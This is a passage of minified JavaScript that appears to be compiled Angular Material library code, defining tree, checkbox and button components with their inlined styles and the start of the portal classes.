function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275dir=Ot({type:t,selectors:[["","matTreeNodeDef",""]],inputs:{when:["matTreeNodeDefWhen","when"],data:["matTreeNode","data"]},features:[ki([{provide:k3,useExisting:t}]),ci]}),t})(),J3=(()=>{class t extends Tw{constructor(e,i,n,r){super(e,i,n),this._disabled=!1,this.tabIndex=Number(r)||0}get disabled(){return this._disabled}set disabled(e){this._disabled=wi(e)}get tabIndex(){return this.disabled?-1:this._tabIndex}set tabIndex(e){this._tabIndex=null!=e?e:0}ngOnInit(){super.ngOnInit()}ngAfterContentInit(){super.ngAfterContentInit()}ngOnDestroy(){super.ngOnDestroy()}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(zh),Ee(Cd),Vr("tabindex"))},t.\u0275dir=Ot({type:t,selectors:[["mat-nested-tree-node"]],hostAttrs:[1,"mat-nested-tree-node"],inputs:{role:"role",disabled:"disabled",tabIndex:"tabIndex",node:["matNestedTreeNode","node"]},exportAs:["matNestedTreeNode"],features:[ki([{provide:Tw,useExisting:t},{provide:hu,useExisting:t},{provide:S3,useExisting:t}]),ci]}),t})(),ab=(()=>{class t{constructor(e,i){this.viewContainer=e,this._node=i}}return t.\u0275fac=function(e){return new(e||t)(Ee(fo),Ee(S3,8))},t.\u0275dir=Ot({type:t,selectors:[["","matTreeNodeOutlet",""]],features:[ki([{provide:Gy,useExisting:t}])]}),t})(),Xw=(()=>{class t extends zh{}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275cmp=Wt({type:t,selectors:[["mat-tree"]],viewQuery:function(e,i){if(1&e&&Mi(ab,7),2&e){let n;Vt(n=Bt())&&(i._nodeOutlet=n.first)}},hostAttrs:["role","tree",1,"mat-tree"],exportAs:["matTree"],features:[ki([{provide:zh,useExisting:t}]),ci],decls:1,vars:0,consts:[["matTreeNodeOutlet",""]],template:function(e,i){1&e&&Ir(0,0)},dependencies:[ab],styles:[".mat-tree{display:block}.mat-tree-node{display:flex;align-items:center;flex:1;word-wrap:break-word}.mat-nested-tree-node{border-bottom-width:0}"],encapsulation:2}),t})(),Yw=(()=>{class t extends Dw{}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275dir=Ot({type:t,selectors:[["","matTreeNodeToggle",""]],inputs:{recursive:["matTreeNodeToggleRecursive","recursive"]},features:[ki([{provide:Dw,useExisting:t}]),ci]}),t})(),BW=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[xw,la,la]}),t})();class HW extends _z{constructor(){super(...arguments),this._data=new zs([])}get data(){return this._data.value}set data(a){this._data.next(a)}connect(a){return ra(a.viewChange,this._data).pipe(Xe(()=>this.data))}disconnect(){}}const __e=["input"],g_e=["label"],C_e=function(t){return{enterDuration:t}},y_e=["*"],b_e=new ni("mat-checkbox-default-options",{providedIn:"root",factory:UW});function UW(){return{color:"accent",clickAction:"check-indeterminate"}}let M_e=0;const qW=UW(),v_e={provide:Ls,useExisting:ja(()=>br),multi:!0};class A_e{}const T_e=mp(kd(Dl(Jc(class{constructor(t){this._elementRef=t}}))));let E_e=(()=>{class t extends T_e{constructor(e,i,n,r,c,d,T){super(i),this._changeDetectorRef=n,this._ngZone=r,this._animationMode=d,this._options=T,this.ariaLabel="",this.ariaLabelledby=null,this.labelPosition="after",this.name=null,this.change=new Tt,this.indeterminateChange=new Tt,this._onTouched=()=>{},this._currentAnimationClass="",this._currentCheckState=0,this._controlValueAccessorChangeFn=()=>{},this._checked=!1,this._disabled=!1,this._indeterminate=!1,this._options=this._options||qW,this.color=this.defaultColor=this._options.color||qW.color,this.tabIndex=parseInt(c)||0,this.id=this._uniqueId=`${e}${++M_e}`}get inputId(){return`${this.id||this._uniqueId}-input`}get required(){return this._required}set required(e){this._required=wi(e)}ngAfterViewInit(){this._syncIndeterminate(this._indeterminate)}get checked(){return this._checked}set checked(e){const i=wi(e);i!=this.checked&&(this._checked=i,this._changeDetectorRef.markForCheck())}get disabled(){return this._disabled}set disabled(e){const i=wi(e);i!==this.disabled&&(this._disabled=i,this._changeDetectorRef.markForCheck())}get indeterminate(){return this._indeterminate}set indeterminate(e){const i=e!=this._indeterminate;this._indeterminate=wi(e),i&&(this._transitionCheckState(this._indeterminate?3:this.checked?1:2),this.indeterminateChange.emit(this._indeterminate)),this._syncIndeterminate(this._indeterminate)}_isRippleDisabled(){return this.disableRipple||this.disabled}_onLabelTextChange(){this._changeDetectorRef.detectChanges()}writeValue(e){this.checked=!!e}registerOnChange(e){this._controlValueAccessorChangeFn=e}registerOnTouched(e){this._onTouched=e}setDisabledState(e){this.disabled=e}_getAriaChecked(){return this.checked?"true":this.indeterminate?"mixed":"false"}_transitionCheckState(e){let i=this._currentCheckState,n=this._getAnimationTargetElement();if(i!==e&&n&&(this._currentAnimationClass&&n.classList.remove(this._currentAnimationClass),this._currentAnimationClass=this._getAnimationClassForCheckStateTransition(i,e),this._currentCheckState=e,this._currentAnimationClass.length>0)){n.classList.add(this._currentAnimationClass);const r=this._currentAnimationClass;this._ngZone.runOutsideAngular(()=>{setTimeout(()=>{n.classList.remove(r)},1e3)})}}_emitChangeEvent(){this._controlValueAccessorChangeFn(this.checked),this.change.emit(this._createChangeEvent(this.checked)),this._inputElement&&(this._inputElement.nativeElement.checked=this.checked)}toggle(){this.checked=!this.checked,this._controlValueAccessorChangeFn(this.checked)}_handleInputClick(){var e;const i=null===(e=this._options)||void 0===e?void 0:e.clickAction;this.disabled||"noop"===i?!this.disabled&&"noop"===i&&(this._inputElement.nativeElement.checked=this.checked,this._inputElement.nativeElement.indeterminate=this.indeterminate):(this.indeterminate&&"check"!==i&&Promise.resolve().then(()=>{this._indeterminate=!1,this.indeterminateChange.emit(this._indeterminate)}),this._checked=!this._checked,this._transitionCheckState(this._checked?1:2),this._emitChangeEvent())}_onInteractionEvent(e){e.stopPropagation()}_onBlur(){Promise.resolve().then(()=>{this._onTouched(),this._changeDetectorRef.markForCheck()})}_getAnimationClassForCheckStateTransition(e,i){if("NoopAnimations"===this._animationMode)return"";switch(e){case 0:if(1===i)return this._animationClasses.uncheckedToChecked;if(3==i)return this._checked?this._animationClasses.checkedToIndeterminate:this._animationClasses.uncheckedToIndeterminate;break;case 2:return 1===i?this._animationClasses.uncheckedToChecked:this._animationClasses.uncheckedToIndeterminate;case 1:return 2===i?this._animationClasses.checkedToUnchecked:this._animationClasses.checkedToIndeterminate;case 3:return 1===i?this._animationClasses.indeterminateToChecked:this._animationClasses.indeterminateToUnchecked}return""}_syncIndeterminate(e){const i=this._inputElement;i&&(i.nativeElement.indeterminate=e)}}return t.\u0275fac=function(e){pd()},t.\u0275dir=Ot({type:t,viewQuery:function(e,i){if(1&e&&(Mi(__e,5),Mi(g_e,5),Mi(xl,5)),2&e){let n;Vt(n=Bt())&&(i._inputElement=n.first),Vt(n=Bt())&&(i._labelElement=n.first),Vt(n=Bt())&&(i.ripple=n.first)}},inputs:{ariaLabel:["aria-label","ariaLabel"],ariaLabelledby:["aria-labelledby","ariaLabelledby"],ariaDescribedby:["aria-describedby","ariaDescribedby"],id:"id",required:"required",labelPosition:"labelPosition",name:"name",value:"value",checked:"checked",disabled:"disabled",indeterminate:"indeterminate"},outputs:{change:"change",indeterminateChange:"indeterminateChange"},features:[ci]}),t})(),br=(()=>{class t extends E_e{constructor(e,i,n,r,c,d,T){super("mat-checkbox-",e,i,r,c,d,T),this._focusMonitor=n,this._animationClasses={uncheckedToChecked:"mat-checkbox-anim-unchecked-checked",uncheckedToIndeterminate:"mat-checkbox-anim-unchecked-indeterminate",checkedToUnchecked:"mat-checkbox-anim-checked-unchecked",checkedToIndeterminate:"mat-checkbox-anim-checked-indeterminate",indeterminateToChecked:"mat-checkbox-anim-indeterminate-checked",indeterminateToUnchecked:"mat-checkbox-anim-indeterminate-unchecked"}}_createChangeEvent(e){const i=new A_e;return i.source=this,i.checked=e,i}_getAnimationTargetElement(){return this._elementRef.nativeElement}ngAfterViewInit(){super.ngAfterViewInit(),this._focusMonitor.monitor(this._elementRef,!0).subscribe(e=>{e||this._onBlur()})}ngOnDestroy(){this._focusMonitor.stopMonitoring(this._elementRef)}_onInputClick(e){e.stopPropagation(),super._handleInputClick()}focus(e,i){e?this._focusMonitor.focusVia(this._inputElement,e,i):this._inputElement.nativeElement.focus(i)}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(Ma),Ee(js),Ee(qi),Vr("tabindex"),Ee(ir,8),Ee(b_e,8))},t.\u0275cmp=Wt({type:t,selectors:[["mat-checkbox"]],hostAttrs:[1,"mat-checkbox"],hostVars:14,hostBindings:function(e,i){2&e&&(Gs("id",i.id),Rt("tabindex",null)("aria-label",null)("aria-labelledby",null),Ct("mat-checkbox-indeterminate",i.indeterminate)("mat-checkbox-checked",i.checked)("mat-checkbox-disabled",i.disabled)("mat-checkbox-label-before","before"==i.labelPosition)("_mat-animation-noopable","NoopAnimations"===i._animationMode))},inputs:{disableRipple:"disableRipple",color:"color",tabIndex:"tabIndex"},exportAs:["matCheckbox"],features:[ki([v_e]),ci],ngContentSelectors:y_e,decls:17,vars:21,consts:[[1,"mat-checkbox-layout"],["label",""],[1,"mat-checkbox-inner-container"],["type","checkbox",1,"mat-checkbox-input","cdk-visually-hidden",3,"id","required","checked","disabled","tabIndex","change","click"],["input",""],["matRipple","",1,"mat-checkbox-ripple","mat-focus-indicator",3,"matRippleTrigger","matRippleDisabled","matRippleRadius","matRippleCentered","matRippleAnimation"],[1,"mat-ripple-element","mat-checkbox-persistent-ripple"],[1,"mat-checkbox-frame"],[1,"mat-checkbox-background"],["version","1.1","focusable","false","viewBox","0 0 24 24","aria-hidden","true",1,"mat-checkbox-checkmark"],["fill","none","stroke","white","d","M4.1,12.7 9,17.6 20.3,6.3",1,"mat-checkbox-checkmark-path"],[1,"mat-checkbox-mixedmark"],[1,"mat-checkbox-label",3,"cdkObserveContent"],["checkboxLabel",""],[2,"display","none"]],template:function(e,i){if(1&e&&(Jn(),m(0,"label",0,1)(2,"span",2)(3,"input",3,4),he("change",function(r){return i._onInteractionEvent(r)})("click",function(r){return i._onInputClick(r)}),u(),m(5,"span",5),it(6,"span",6),u(),it(7,"span",7),m(8,"span",8),fi(),m(9,"svg",9),it(10,"path",10),u(),ln(),it(11,"span",11),u()(),m(12,"span",12,13),he("cdkObserveContent",function(){return i._onLabelTextChange()}),m(14,"span",14),s(15,"\xa0"),u(),va(16),u()()),2&e){const n=Ti(1),r=Ti(13);Rt("for",i.inputId),C(2),Ct("mat-checkbox-inner-container-no-side-margin",!r.textContent||!r.textContent.trim()),C(1),V("id",i.inputId)("required",i.required)("checked",i.checked)("disabled",i.disabled)("tabIndex",i.tabIndex),Rt("value",i.value)("name",i.name)("aria-label",i.ariaLabel||null)("aria-labelledby",i.ariaLabelledby)("aria-checked",i._getAriaChecked())("aria-describedby",i.ariaDescribedby),C(2),V("matRippleTrigger",n)("matRippleDisabled",i._isRippleDisabled())("matRippleRadius",20)("matRippleCentered",!0)("matRippleAnimation",fr(19,C_e,"NoopAnimations"===i._animationMode?0:150))}},dependencies:[xl,P3],styles:['@keyframes mat-checkbox-fade-in-background{0%{opacity:0}50%{opacity:1}}@keyframes mat-checkbox-fade-out-background{0%,50%{opacity:1}100%{opacity:0}}@keyframes mat-checkbox-unchecked-checked-checkmark-path{0%,50%{stroke-dashoffset:22.910259}50%{animation-timing-function:cubic-bezier(0, 0, 0.2, 0.1)}100%{stroke-dashoffset:0}}@keyframes mat-checkbox-unchecked-indeterminate-mixedmark{0%,68.2%{transform:scaleX(0)}68.2%{animation-timing-function:cubic-bezier(0, 0, 0, 1)}100%{transform:scaleX(1)}}@keyframes mat-checkbox-checked-unchecked-checkmark-path{from{animation-timing-function:cubic-bezier(0.4, 0, 1, 1);stroke-dashoffset:0}to{stroke-dashoffset:-22.910259}}@keyframes mat-checkbox-checked-indeterminate-checkmark{from{animation-timing-function:cubic-bezier(0, 0, 0.2, 0.1);opacity:1;transform:rotate(0deg)}to{opacity:0;transform:rotate(45deg)}}@keyframes mat-checkbox-indeterminate-checked-checkmark{from{animation-timing-function:cubic-bezier(0.14, 0, 0, 1);opacity:0;transform:rotate(45deg)}to{opacity:1;transform:rotate(360deg)}}@keyframes mat-checkbox-checked-indeterminate-mixedmark{from{animation-timing-function:cubic-bezier(0, 0, 0.2, 0.1);opacity:0;transform:rotate(-45deg)}to{opacity:1;transform:rotate(0deg)}}@keyframes mat-checkbox-indeterminate-checked-mixedmark{from{animation-timing-function:cubic-bezier(0.14, 0, 0, 1);opacity:1;transform:rotate(0deg)}to{opacity:0;transform:rotate(315deg)}}@keyframes mat-checkbox-indeterminate-unchecked-mixedmark{0%{animation-timing-function:linear;opacity:1;transform:scaleX(1)}32.8%,100%{opacity:0;transform:scaleX(0)}}.mat-checkbox-background,.mat-checkbox-frame{top:0;left:0;right:0;bottom:0;position:absolute;border-radius:2px;box-sizing:border-box;pointer-events:none}.mat-checkbox{display:inline-block;transition:background 400ms cubic-bezier(0.25, 0.8, 0.25, 1),box-shadow 280ms cubic-bezier(0.4, 0, 0.2, 1);cursor:pointer;-webkit-tap-highlight-color:rgba(0,0,0,0);position:relative}.mat-checkbox._mat-animation-noopable{transition:none !important;animation:none !important}.mat-checkbox .mat-ripple-element:not(.mat-checkbox-persistent-ripple){opacity:.16}.mat-checkbox .mat-checkbox-ripple{position:absolute;left:calc(50% - 20px);top:calc(50% - 20px);height:40px;width:40px;z-index:1;pointer-events:none}.mat-checkbox-layout{-webkit-user-select:none;user-select:none;cursor:inherit;align-items:baseline;vertical-align:middle;display:inline-flex;white-space:nowrap}.mat-checkbox-label{-webkit-user-select:auto;user-select:auto}.mat-checkbox-inner-container{display:inline-block;height:16px;line-height:0;margin:auto;margin-right:8px;order:0;position:relative;vertical-align:middle;white-space:nowrap;width:16px;flex-shrink:0}[dir=rtl] .mat-checkbox-inner-container{margin-left:8px;margin-right:auto}.mat-checkbox-inner-container-no-side-margin{margin-left:0;margin-right:0}.mat-checkbox-frame{background-color:rgba(0,0,0,0);transition:border-color 90ms cubic-bezier(0, 0, 0.2, 0.1);border-width:2px;border-style:solid}._mat-animation-noopable .mat-checkbox-frame{transition:none}.mat-checkbox-background{align-items:center;display:inline-flex;justify-content:center;transition:background-color 90ms cubic-bezier(0, 0, 0.2, 0.1),opacity 90ms cubic-bezier(0, 0, 0.2, 0.1);-webkit-print-color-adjust:exact;color-adjust:exact}._mat-animation-noopable .mat-checkbox-background{transition:none}.cdk-high-contrast-active .mat-checkbox .mat-checkbox-background{background:none}.mat-checkbox-persistent-ripple{display:block;width:100%;height:100%;transform:none}.mat-checkbox-inner-container:hover .mat-checkbox-persistent-ripple{opacity:.04}.mat-checkbox.cdk-keyboard-focused .mat-checkbox-persistent-ripple{opacity:.12}.mat-checkbox-persistent-ripple,.mat-checkbox.mat-checkbox-disabled .mat-checkbox-inner-container:hover .mat-checkbox-persistent-ripple{opacity:0}@media(hover: none){.mat-checkbox-inner-container:hover .mat-checkbox-persistent-ripple{display:none}}.mat-checkbox-checkmark{top:0;left:0;right:0;bottom:0;position:absolute;width:100%}.mat-checkbox-checkmark-path{stroke-dashoffset:22.910259;stroke-dasharray:22.910259;stroke-width:2.1333333333px}.cdk-high-contrast-black-on-white .mat-checkbox-checkmark-path{stroke:#000 !important}.mat-checkbox-mixedmark{width:calc(100% - 6px);height:2px;opacity:0;transform:scaleX(0) rotate(0deg);border-radius:2px}.cdk-high-contrast-active .mat-checkbox-mixedmark{height:0;border-top:solid 2px;margin-top:2px}.mat-checkbox-label-before .mat-checkbox-inner-container{order:1;margin-left:8px;margin-right:auto}[dir=rtl] .mat-checkbox-label-before .mat-checkbox-inner-container{margin-left:auto;margin-right:8px}.mat-checkbox-checked .mat-checkbox-checkmark{opacity:1}.mat-checkbox-checked .mat-checkbox-checkmark-path{stroke-dashoffset:0}.mat-checkbox-checked .mat-checkbox-mixedmark{transform:scaleX(1) rotate(-45deg)}.mat-checkbox-indeterminate .mat-checkbox-checkmark{opacity:0;transform:rotate(45deg)}.mat-checkbox-indeterminate .mat-checkbox-checkmark-path{stroke-dashoffset:0}.mat-checkbox-indeterminate .mat-checkbox-mixedmark{opacity:1;transform:scaleX(1) rotate(0deg)}.mat-checkbox-unchecked .mat-checkbox-background{background-color:rgba(0,0,0,0)}.mat-checkbox-disabled{cursor:default}.cdk-high-contrast-active .mat-checkbox-disabled{opacity:.5}.mat-checkbox-anim-unchecked-checked .mat-checkbox-background{animation:180ms linear 0ms mat-checkbox-fade-in-background}.mat-checkbox-anim-unchecked-checked .mat-checkbox-checkmark-path{animation:180ms linear 0ms mat-checkbox-unchecked-checked-checkmark-path}.mat-checkbox-anim-unchecked-indeterminate .mat-checkbox-background{animation:180ms linear 0ms mat-checkbox-fade-in-background}.mat-checkbox-anim-unchecked-indeterminate .mat-checkbox-mixedmark{animation:90ms linear 0ms mat-checkbox-unchecked-indeterminate-mixedmark}.mat-checkbox-anim-checked-unchecked .mat-checkbox-background{animation:180ms linear 0ms mat-checkbox-fade-out-background}.mat-checkbox-anim-checked-unchecked .mat-checkbox-checkmark-path{animation:90ms linear 0ms mat-checkbox-checked-unchecked-checkmark-path}.mat-checkbox-anim-checked-indeterminate .mat-checkbox-checkmark{animation:90ms linear 0ms mat-checkbox-checked-indeterminate-checkmark}.mat-checkbox-anim-checked-indeterminate .mat-checkbox-mixedmark{animation:90ms linear 0ms mat-checkbox-checked-indeterminate-mixedmark}.mat-checkbox-anim-indeterminate-checked .mat-checkbox-checkmark{animation:500ms linear 0ms mat-checkbox-indeterminate-checked-checkmark}.mat-checkbox-anim-indeterminate-checked .mat-checkbox-mixedmark{animation:500ms linear 0ms mat-checkbox-indeterminate-checked-mixedmark}.mat-checkbox-anim-indeterminate-unchecked .mat-checkbox-background{animation:180ms linear 0ms mat-checkbox-fade-out-background}.mat-checkbox-anim-indeterminate-unchecked .mat-checkbox-mixedmark{animation:300ms linear 0ms mat-checkbox-indeterminate-unchecked-mixedmark}.mat-checkbox-input{bottom:0;left:50%}.mat-checkbox-input:focus~.mat-focus-indicator::before{content:""}'],encapsulation:2,changeDetection:0}),t})(),GW=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({}),t})(),jW=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[Pd,la,$y,GW,la,GW]}),t})();const w_e=["mat-button",""],I_e=["*"],S_e=["mat-button","mat-flat-button","mat-icon-button","mat-raised-button","mat-stroked-button","mat-mini-fab","mat-fab"],k_e=kd(Jc(Dl(class{constructor(t){this._elementRef=t}})));let da=(()=>{class t extends k_e{constructor(e,i,n){super(e),this._focusMonitor=i,this._animationMode=n,this.isRoundButton=this._hasHostAttributes("mat-fab","mat-mini-fab"),this.isIconButton=this._hasHostAttributes("mat-icon-button");for(const r of S_e)this._hasHostAttributes(r)&&this._getHostElement().classList.add(r);e.nativeElement.classList.add("mat-button-base"),this.isRoundButton&&(this.color="accent")}ngAfterViewInit(){this._focusMonitor.monitor(this._elementRef,!0)}ngOnDestroy(){this._focusMonitor.stopMonitoring(this._elementRef)}focus(e,i){e?this._focusMonitor.focusVia(this._getHostElement(),e,i):this._getHostElement().focus(i)}_getHostElement(){return this._elementRef.nativeElement}_isRippleDisabled(){return this.disableRipple||this.disabled}_hasHostAttributes(...e){return e.some(i=>this._getHostElement().hasAttribute(i))}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(js),Ee(ir,8))},t.\u0275cmp=Wt({type:t,selectors:[["button","mat-button",""],["button","mat-raised-button",""],["button","mat-icon-button",""],["button","mat-fab",""],["button","mat-mini-fab",""],["button","mat-stroked-button",""],["button","mat-flat-button",""]],viewQuery:function(e,i){if(1&e&&Mi(xl,5),2&e){let n;Vt(n=Bt())&&(i.ripple=n.first)}},hostAttrs:[1,"mat-focus-indicator"],hostVars:5,hostBindings:function(e,i){2&e&&(Rt("disabled",i.disabled||null),Ct("_mat-animation-noopable","NoopAnimations"===i._animationMode)("mat-button-disabled",i.disabled))},inputs:{disabled:"disabled",disableRipple:"disableRipple",color:"color"},exportAs:["matButton"],features:[ci],attrs:w_e,ngContentSelectors:I_e,decls:4,vars:5,consts:[[1,"mat-button-wrapper"],["matRipple","",1,"mat-button-ripple",3,"matRippleDisabled","matRippleCentered","matRippleTrigger"],[1,"mat-button-focus-overlay"]],template:function(e,i){1&e&&(Jn(),m(0,"span",0),va(1),u(),it(2,"span",1)(3,"span",2)),2&e&&(C(2),Ct("mat-button-ripple-round",i.isRoundButton||i.isIconButton),V("matRippleDisabled",i._isRippleDisabled())("matRippleCentered",i.isIconButton)("matRippleTrigger",i._getHostElement()))},dependencies:[xl],styles:[".mat-button .mat-button-focus-overlay,.mat-icon-button .mat-button-focus-overlay{opacity:0}.mat-button:hover:not(.mat-button-disabled) .mat-button-focus-overlay,.mat-stroked-button:hover:not(.mat-button-disabled) .mat-button-focus-overlay{opacity:.04}@media(hover: none){.mat-button:hover:not(.mat-button-disabled) .mat-button-focus-overlay,.mat-stroked-button:hover:not(.mat-button-disabled) .mat-button-focus-overlay{opacity:0}}.mat-button,.mat-icon-button,.mat-stroked-button,.mat-flat-button{box-sizing:border-box;position:relative;-webkit-user-select:none;user-select:none;cursor:pointer;outline:none;border:none;-webkit-tap-highlight-color:rgba(0,0,0,0);display:inline-block;white-space:nowrap;text-decoration:none;vertical-align:baseline;text-align:center;margin:0;min-width:64px;line-height:36px;padding:0 16px;border-radius:4px;overflow:visible}.mat-button::-moz-focus-inner,.mat-icon-button::-moz-focus-inner,.mat-stroked-button::-moz-focus-inner,.mat-flat-button::-moz-focus-inner{border:0}.mat-button.mat-button-disabled,.mat-icon-button.mat-button-disabled,.mat-stroked-button.mat-button-disabled,.mat-flat-button.mat-button-disabled{cursor:default}.mat-button.cdk-keyboard-focused .mat-button-focus-overlay,.mat-button.cdk-program-focused .mat-button-focus-overlay,.mat-icon-button.cdk-keyboard-focused .mat-button-focus-overlay,.mat-icon-button.cdk-program-focused .mat-button-focus-overlay,.mat-stroked-button.cdk-keyboard-focused .mat-button-focus-overlay,.mat-stroked-button.cdk-program-focused .mat-button-focus-overlay,.mat-flat-button.cdk-keyboard-focused .mat-button-focus-overlay,.mat-flat-button.cdk-program-focused .mat-button-focus-overlay{opacity:.12}.mat-button::-moz-focus-inner,.mat-icon-button::-moz-focus-inner,.mat-stroked-button::-moz-focus-inner,.mat-flat-button::-moz-focus-inner{border:0}.mat-raised-button{box-sizing:border-box;position:relative;-webkit-user-select:none;user-select:none;cursor:pointer;outline:none;border:none;-webkit-tap-highlight-color:rgba(0,0,0,0);display:inline-block;white-space:nowrap;text-decoration:none;vertical-align:baseline;text-align:center;margin:0;min-width:64px;line-height:36px;padding:0 16px;border-radius:4px;overflow:visible;transform:translate3d(0, 0, 0);transition:background 400ms cubic-bezier(0.25, 0.8, 0.25, 1),box-shadow 280ms cubic-bezier(0.4, 0, 0.2, 1)}.mat-raised-button::-moz-focus-inner{border:0}.mat-raised-button.mat-button-disabled{cursor:default}.mat-raised-button.cdk-keyboard-focused .mat-button-focus-overlay,.mat-raised-button.cdk-program-focused .mat-button-focus-overlay{opacity:.12}.mat-raised-button::-moz-focus-inner{border:0}.mat-raised-button._mat-animation-noopable{transition:none !important;animation:none !important}.mat-stroked-button{border:1px solid currentColor;padding:0 15px;line-height:34px}.mat-stroked-button .mat-button-ripple.mat-ripple,.mat-stroked-button .mat-button-focus-overlay{top:-1px;left:-1px;right:-1px;bottom:-1px}.mat-fab{box-sizing:border-box;position:relative;-webkit-user-select:none;user-select:none;cursor:pointer;outline:none;border:none;-webkit-tap-highlight-color:rgba(0,0,0,0);display:inline-block;white-space:nowrap;text-decoration:none;vertical-align:baseline;text-align:center;margin:0;min-width:64px;line-height:36px;padding:0 16px;border-radius:4px;overflow:visible;transform:translate3d(0, 0, 0);transition:background 400ms cubic-bezier(0.25, 0.8, 0.25, 1),box-shadow 280ms cubic-bezier(0.4, 0, 0.2, 1);min-width:0;border-radius:50%;width:56px;height:56px;padding:0;flex-shrink:0}.mat-fab::-moz-focus-inner{border:0}.mat-fab.mat-button-disabled{cursor:default}.mat-fab.cdk-keyboard-focused .mat-button-focus-overlay,.mat-fab.cdk-program-focused .mat-button-focus-overlay{opacity:.12}.mat-fab::-moz-focus-inner{border:0}.mat-fab._mat-animation-noopable{transition:none !important;animation:none !important}.mat-fab .mat-button-wrapper{padding:16px 0;display:inline-block;line-height:24px}.mat-mini-fab{box-sizing:border-box;position:relative;-webkit-user-select:none;user-select:none;cursor:pointer;outline:none;border:none;-webkit-tap-highlight-color:rgba(0,0,0,0);display:inline-block;white-space:nowrap;text-decoration:none;vertical-align:baseline;text-align:center;margin:0;min-width:64px;line-height:36px;padding:0 16px;border-radius:4px;overflow:visible;transform:translate3d(0, 0, 0);transition:background 400ms cubic-bezier(0.25, 0.8, 0.25, 1),box-shadow 280ms cubic-bezier(0.4, 0, 0.2, 1);min-width:0;border-radius:50%;width:40px;height:40px;padding:0;flex-shrink:0}.mat-mini-fab::-moz-focus-inner{border:0}.mat-mini-fab.mat-button-disabled{cursor:default}.mat-mini-fab.cdk-keyboard-focused .mat-button-focus-overlay,.mat-mini-fab.cdk-program-focused .mat-button-focus-overlay{opacity:.12}.mat-mini-fab::-moz-focus-inner{border:0}.mat-mini-fab._mat-animation-noopable{transition:none !important;animation:none !important}.mat-mini-fab .mat-button-wrapper{padding:8px 0;display:inline-block;line-height:24px}.mat-icon-button{padding:0;min-width:0;width:40px;height:40px;flex-shrink:0;line-height:40px;border-radius:50%}.mat-icon-button i,.mat-icon-button .mat-icon{line-height:24px}.mat-button-ripple.mat-ripple,.mat-button-focus-overlay{top:0;left:0;right:0;bottom:0;position:absolute;pointer-events:none;border-radius:inherit}.mat-button-ripple.mat-ripple:not(:empty){transform:translateZ(0)}.mat-button-focus-overlay{opacity:0;transition:opacity 200ms cubic-bezier(0.35, 0, 0.25, 1),background-color 200ms cubic-bezier(0.35, 0, 0.25, 1)}._mat-animation-noopable .mat-button-focus-overlay{transition:none}.mat-button-ripple-round{border-radius:50%;z-index:1}.mat-button .mat-button-wrapper>*,.mat-flat-button .mat-button-wrapper>*,.mat-stroked-button .mat-button-wrapper>*,.mat-raised-button .mat-button-wrapper>*,.mat-icon-button .mat-button-wrapper>*,.mat-fab .mat-button-wrapper>*,.mat-mini-fab .mat-button-wrapper>*{vertical-align:middle}.mat-form-field:not(.mat-form-field-appearance-legacy) .mat-form-field-prefix .mat-icon-button,.mat-form-field:not(.mat-form-field-appearance-legacy) .mat-form-field-suffix .mat-icon-button{display:inline-flex;justify-content:center;align-items:center;font-size:inherit;width:2.5em;height:2.5em}.mat-flat-button::before,.mat-raised-button::before,.mat-fab::before,.mat-mini-fab::before{margin:calc(calc(var(--mat-focus-indicator-border-width, 3px) + 2px) * -1)}.mat-stroked-button::before{margin:calc(calc(var(--mat-focus-indicator-border-width, 3px) + 3px) * -1)}.cdk-high-contrast-active .mat-button,.cdk-high-contrast-active .mat-flat-button,.cdk-high-contrast-active .mat-raised-button,.cdk-high-contrast-active .mat-icon-button,.cdk-high-contrast-active .mat-fab,.cdk-high-contrast-active .mat-mini-fab{outline:solid 1px}"],encapsulation:2,changeDetection:0}),t})(),hp=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[Pd,la,la]}),t})(),QW=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[la,la]}),t})();function $W(t,a){return a?e=>hg(a.pipe(Cn(1),function P_e(){return Ie((t,a)=>{t.subscribe(Ae(a,y))})}()),e.pipe($W(t))):Ut((e,i)=>t(e,i).pipe(Cn(1),H4(e)))}function Z3(t,a=Vy){const e=M3(t,a);return $W(()=>e)}class Jw{attach(a){return this._attachedHost=a,a.attach(this)}detach(){let a=this._attachedHost;null!=a&&(this._attachedHost=null,a.detach())}get isAttached(){return null!=this._attachedHost}setAttachedHost(a){this._attachedHost=a}}class fp extends Jw{constructor(a,e,i,n){super(),this.component=a,this.viewContainerRef=e,this.injector=i,this.componentFactoryResolver=n}}class Mm extends Jw{constructor(a,e,i,n){super(),this.templateRef=a,this.viewContainerRef=e,this.context=i,this.injector=n}get origin(){return this.templateRef.elementRef}attach(a,e=this.context){return this.context=e,super.attach(a)}detach(){return this.context=void 0,super.detach()}}class O_e extends Jw{constructor(a){super(),this.element=a instanceof mi?a.nativeElement:a}}class eA{constructor(){this._isDisposed=!1,this.attachDomPortal=null}hasAttached(){return!!this._attachedPortal}attach(a){return a instanceof fp?(this._attachedPortal=a,this.attachComponentPortal(a)):a instanceof Mm?(this._attachedPortal=a,this.attachTemplatePortal(a)):this.attachDomPortal&&a instanceof O_e?(this._attachedPortal=a,this.attachDomPortal(a)):void 0}detach(){this._attachedPortal&&(this._attachedPortal.setAttachedHost(null),this._attachedPortal=null),this._invokeDisposeFn()}dispose(){this.hasAttached()&&this.detach(),this._invokeDisposeFn(),this._isDisposed=!0}setDisposeFn(a){this._disposeFn=a}_invokeDisposeFn(){this._disposeFn&&(this._disposeFn(),this._disposeFn=null)}}class Zw extends eA{constructor(a,e,i,n,r){super(),this.outletElement=a,this._componentFactoryResolver=e,this._appRef=i,this._defaultInjector=n,this.attachDomPortal=c=>{const 